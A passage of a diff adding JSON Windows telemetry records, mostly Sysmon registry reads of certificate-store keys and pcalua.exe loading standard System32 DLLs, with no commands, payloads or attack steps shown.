"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "pcaui.dll", + "image_path": "C:\\Windows\\System32\\pcaui.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wer.dll", + "image_path": "C:\\Windows\\System32\\wer.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974330000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974330000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "msctf.dll", + "image_path": "C:\\Windows\\System32\\msctf.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974330000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974330000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "image_load", + "image_name": "TextInputFramework.dll", + "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "CoreUIComponents.dll", + "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreUAPCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": 